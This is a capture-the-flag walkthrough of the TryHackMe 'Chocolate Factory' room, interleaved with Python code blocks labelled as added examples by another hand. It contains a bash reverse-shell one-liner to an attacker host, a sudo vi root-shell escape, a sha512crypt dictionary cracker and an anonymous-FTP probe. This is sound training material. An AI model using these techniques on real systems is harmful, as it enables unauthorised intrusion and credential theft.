Mr.Salvat0re
3 min read · Jan 23, 2021


Chocolate Factory walk-through — TryHackMe

In this article I help you own the chocolate factory! Chocolate Factory is a newly released room on THM (TryHackMe), and it's free! In this room we will do some steganography, enumeration, password cracking and privilege escalation. It's rated easy. Let's jump in!

Enumeration

First deploy the machine and get the IP address.

Because we need that IP address a lot, let's put it in a shell variable to make it easy to use.

export ip=[machine-IP]

Test it with:

echo $ip

Then run nmap against the machine (using the variable we just set):

nmap -sV $ip -oN nmap_scan

  • -sV : Detects the services and their versions.
  • -oN : Saves the output into the nmap_scan file in the current directory (normal format).

The output of the scan:

As you can see, there are lots of open ports but most of them aren't useful. Let's check the FTP port for anonymous login.

and ... yes, we can log in (username and password: anonymous).

Run ls or dir; there is a file. Download it with:

get <file-name>
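The enumeration steps above (scan, read the open ports, try anonymous FTP) are easy to script. The following is an added example, not code from the original walkthrough: it parses nmap's normal (-oN) output, maps each open port to the manual check a pentester would run next, and includes an ftplib helper that attempts an anonymous login and returns the directory listing. The scan text embedded in it is constructed for illustration and is not the room's real output; the host 10.10.10.10 is a placeholder.

```python
"""Parse an `nmap -oN` scan and decide what to check next.

Added example, not part of the original walkthrough. SAMPLE_SCAN is a
constructed scan in nmap "normal" output format, not the room's output.
"""
import re
from ftplib import FTP, error_perm

SAMPLE_SCAN = """\
# Nmap 7.91 scan initiated Sat Jan 23 10:00:00 2021 as: nmap -sV -oN nmap_scan 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.050s latency).
Not shown: 990 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.3
22/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu))
100/tcp filtered unknown
113/tcp open  ident?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# Nmap done at Sat Jan 23 10:01:00 2021 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version ...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_open_ports(scan_text):
    """Return [(port, proto, service, version)] for every port nmap reports open."""
    found = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        if state != "open":          # skip filtered/closed lines
            continue
        found.append((int(port), proto, service, version or ""))
    return found


# Services where a quick manual check is cheap and often pays off.
MANUAL_CHECKS = {
    "ftp": "try anonymous login (user and password: anonymous)",
    "http": "browse it; look for login forms and input boxes",
    "ssh": "try any credentials found elsewhere",
}


def suggest_checks(scan_text):
    """Map each open port to the manual check to run next."""
    return {port: MANUAL_CHECKS.get(service, "enumerate manually")
            for port, _proto, service, _version in parse_open_ports(scan_text)}


def check_anonymous_ftp(host, port=21, timeout=5):
    """Try an anonymous FTP login; return the directory listing, or None on failure.

    Network call; not exercised by the offline sample above.
    """
    try:
        ftp = FTP()
        ftp.connect(host, port, timeout=timeout)
        ftp.login()                  # ftplib defaults to user "anonymous"
        listing = ftp.nlst()
        ftp.quit()
        return listing
    except (OSError, error_perm):
        return None


if __name__ == "__main__":
    for port, proto, service, version in parse_open_ports(SAMPLE_SCAN):
        print(f"{port}/{proto} {service} {version} -> {suggest_checks(SAMPLE_SCAN)[port]}")
```

Point parse_open_ports at the real nmap_scan file (open("nmap_scan").read()) and, if port 21 shows up, call check_anonymous_ftp(host) to confirm the anonymous login before doing it by hand.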

I use steghide to extract the hidden file (steghide extract -sf on the downloaded file).

After some decoding, you see the passwd file of the machine!

Hopefully there are user credentials in it, but the password is stored as a hash (a $6$ sha512crypt hash), so let's bring john in (not Hammond :)).

john --format=sha512crypt file.hash --wordlist=/usr/share/wordlists/rockyou.txt

After a minute or two john gives you the password.

Let's use the creds to log in over SSH.
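To see what john is doing with a $6$ hash, here is an added example (not the walkthrough's own code) that implements sha512crypt from the sha-crypt specification with only the standard library and runs a small dictionary attack against a shadow-style line. The shadow line and the wordlist are constructed for the demo (user "demo"); the hash in it is the public $6$saltstring$ test vector for "Hello world!" from the specification, not anything from the room.

```python
"""What `john --format=sha512crypt` computes for each candidate password.

Added example, not part of the original walkthrough. SHADOW_LINE and
WORDLIST are constructed; the hash is the spec's public test vector.
"""
import hashlib

B64_ALPHABET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# glibc emits the 64 digest bytes in this permuted order: 3 bytes -> 4 chars,
# then byte 63 alone -> 2 chars (86 chars in total).
_TRIPLES = [
    (0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
    (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
    (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
    (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
    (62, 20, 41),
]


def _b64_from_24bit(b2, b1, b0, n):
    """crypt(3)-style base64: n characters, 6 bits at a time, low bits first."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(B64_ALPHABET[w & 0x3F])
        w >>= 6
    return "".join(out)


def _encode(digest):
    s = "".join(_b64_from_24bit(digest[a], digest[b], digest[c], 4) for a, b, c in _TRIPLES)
    return s + _b64_from_24bit(0, 0, digest[63], 2)


def _stretch(block, length):
    """Repeat a 64-byte digest to cover `length` bytes (spec steps 15 and 19)."""
    return (block * (length // 64 + 1))[:length]


def sha512_crypt(password, salt, rounds=5000):
    """Return the full "$6$[rounds=N$]salt$hash" string for password/salt."""
    pw = password.encode()
    salt = salt[:16].encode()            # glibc uses at most 16 salt characters
    sha = hashlib.sha512
    b = sha(pw + salt + pw).digest()     # digest B
    a_ctx = sha(pw + salt)               # digest A
    n = len(pw)
    while n > 64:                        # one full B per 64 bytes of password ...
        a_ctx.update(b)
        n -= 64
    a_ctx.update(b[:n])                  # ... then the first n bytes of B
    n = len(pw)
    while n > 0:                         # bits of len(pw): 1 -> add B, 0 -> add password
        a_ctx.update(b if n & 1 else pw)
        n >>= 1
    a = a_ctx.digest()
    p = _stretch(sha(pw * len(pw)).digest(), len(pw))          # byte sequence P
    s = _stretch(sha(salt * (16 + a[0])).digest(), len(salt))  # byte sequence S
    c = a
    for i in range(rounds):              # the expensive part john has to repeat per guess
        h = sha()
        h.update(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    prefix = "$6$" + (f"rounds={rounds}$" if rounds != 5000 else "") + salt.decode() + "$"
    return prefix + _encode(c)


def parse_shadow_line(line):
    """Return (user, rounds, salt, hash) from a shadow entry with a $6$ hash."""
    user, field = line.split(":")[:2]
    parts = field.split("$")             # ['', '6', ['rounds=N',] salt, hash]
    if len(parts) < 4 or parts[1] != "6":
        raise ValueError("not a sha512crypt ($6$) hash")
    rounds = 5000
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
        parts.pop(2)
    return user, rounds, parts[2], parts[3]


def crack(shadow_line, wordlist):
    """Offline dictionary attack: hash each candidate with the stored salt and compare."""
    user, rounds, salt, stored = parse_shadow_line(shadow_line)
    target = ("$6$" if rounds == 5000 else f"$6$rounds={rounds}$") + salt + "$" + stored
    for word in wordlist:
        if sha512_crypt(word, salt, rounds) == target:
            return user, word
    return None


# Constructed demo data: spec test vector for "Hello world!" under a fake user.
SHADOW_LINE = ("demo:$6$saltstring$svn8UoSVapNtMuq1ukKS4tPQd8iKwSMHWjl/O817G3uBnIFNjnQJuesI68u4OTLiBFdcbYEdFCoEOfaS35inz1"
               ":18650:0:99999:7:::")
WORDLIST = ["password", "chocolate", "wonka", "Hello world!", "charlie"]

if __name__ == "__main__":
    print(crack(SHADOW_LINE, WORDLIST))
```

Swap WORDLIST for the lines of rockyou.txt and SHADOW_LINE for the real entry to reproduce the john run; the per-guess cost (5000 SHA-512 rounds here) is exactly why john takes a minute or two even on an easy password.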

but it says the password is incorrect :/

Let’s move on…

Check the website of the machine. We see that beautiful login page; put the username and password into it and boom! We are LOGGED IN.

There is a small input box there with an Execute button, so let's put a reverse shell in it: start a listener on your machine (nc -lvnp 4444) and submit a one-liner such as bash -c 'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1'.

KEY:

If you run the strings command against all the files in /var/www/html (strings /var/www/html/*) you can find the key!

USER Flag:

After some searching you will find that the permissions on the user's folder inside /home are not restricted (check with ls -la /home), so you can go inside.

There is a file called teleport, which is an SSH private key (id_rsa). So log in with that:

chmod 600 teleport; ssh -i teleport charlie@$ip

Now we are charlie. So, without wasting time, let's submit the user flag.

ROOT Flag:

As a hint: any time you log in as a user, run sudo -l to see whether there is any command you are allowed to run with sudo.

Charlie can run /usr/bin/vi with sudo without a password.

Let's check GTFOBins for some magic (the shell section): vi can spawn a shell from inside the editor, so sudo vi -c ':!/bin/sh' /dev/null drops you into a root shell.

After moving to the /root directory you can't find root.txt, but you find root.py.

If you read that file, you can work out the encryption type (Fernet).

I use asecuritysite.com to decode it: just put in the key and the encrypted string, and submit the root flag. (Outside a CTF, don't paste a real key into a third-party website; decrypt it locally instead.)
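For readers who want to understand what root.py's Fernet key actually does, here is an added example (not the walkthrough's own code) that inspects a Fernet token locally with only the standard library: it splits the key into its signing and encryption halves, parses the token into version byte, timestamp, IV, ciphertext and HMAC, and checks the HMAC with the signing half, which tells you whether a key belongs to a token before you decrypt anything. The key and token below are constructed for this demo; the "ciphertext" bytes are filler, not real AES output, so the payload is not decryptable. Actual decryption of the room's token is one call with the cryptography package: Fernet(key).decrypt(token).

```python
"""Inspect and authenticate a Fernet token with its key, offline.

Added example, not part of the original walkthrough. DEMO_KEY, WRONG_KEY and
the token built from DEMO_CIPHERTEXT are constructed; DEMO_CIPHERTEXT is
filler bytes, not real AES-128-CBC output.
"""
import base64
import hashlib
import hmac
import os
import struct

VERSION = 0x80  # the only Fernet version byte defined by the spec


def split_key(key_b64):
    """A Fernet key is 32 urlsafe-base64 bytes: signing key (16) || encryption key (16)."""
    raw = base64.urlsafe_b64decode(key_b64)
    if len(raw) != 32:
        raise ValueError("Fernet key must decode to 32 bytes")
    return raw[:16], raw[16:]


def parse_token(token_b64):
    """Split a token into version, timestamp, IV, ciphertext and HMAC fields."""
    raw = base64.urlsafe_b64decode(token_b64)
    if len(raw) < 1 + 8 + 16 + 32 or raw[0] != VERSION:
        raise ValueError("not a Fernet token")
    ciphertext = raw[25:-32]
    if len(ciphertext) % 16:             # AES-CBC output is always whole blocks
        raise ValueError("ciphertext length is not a multiple of the block size")
    return {
        "timestamp": struct.unpack(">Q", raw[1:9])[0],   # seconds since epoch, big-endian
        "iv": raw[9:25],
        "ciphertext": ciphertext,
        "hmac": raw[-32:],
        "signed": raw[:-32],             # everything the HMAC covers
    }


def verify_token(key_b64, token_b64):
    """True iff the token's HMAC-SHA256 was produced with this key's signing half."""
    signing_key, _encryption_key = split_key(key_b64)
    fields = parse_token(token_b64)
    expected = hmac.new(signing_key, fields["signed"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, fields["hmac"])


def build_demo_token(key_b64, ciphertext, timestamp):
    """Assemble a token around already-encrypted bytes (constructed demo only)."""
    signing_key, _ = split_key(key_b64)
    body = bytes([VERSION]) + struct.pack(">Q", timestamp) + os.urandom(16) + ciphertext
    tag = hmac.new(signing_key, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag).decode()


def tamper(token_b64):
    """Flip one bit of the first ciphertext byte; the HMAC check must then fail."""
    raw = bytearray(base64.urlsafe_b64decode(token_b64))
    raw[25] ^= 0x01
    return base64.urlsafe_b64encode(bytes(raw)).decode()


# Constructed demo material (not the room's key or token).
DEMO_KEY = base64.urlsafe_b64encode(b"\x01" * 16 + b"\x02" * 16).decode()
WRONG_KEY = base64.urlsafe_b64encode(b"\x03" * 32).decode()
DEMO_CIPHERTEXT = bytes(range(32))       # filler, two "blocks" of non-AES bytes
DEMO_TOKEN = build_demo_token(DEMO_KEY, DEMO_CIPHERTEXT, 1611360000)  # 2021-01-23 00:00 UTC

if __name__ == "__main__":
    print("timestamp:", parse_token(DEMO_TOKEN)["timestamp"])
    print("valid with DEMO_KEY:", verify_token(DEMO_KEY, DEMO_TOKEN))
    print("valid with WRONG_KEY:", verify_token(WRONG_KEY, DEMO_TOKEN))
```

verify_token is the same check Fernet.decrypt performs before touching the ciphertext, which is why a wrong key produces an InvalidToken error rather than garbage plaintext; the encryption half of the key is only used afterwards, for AES-128-CBC.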

Thank YOU!

Believe it or not, it was my first published walk-through and of course it's not the last. I hope you found it useful.

Keep hacking!

Salvat0re.


Just a normal person who loves Python and hacking.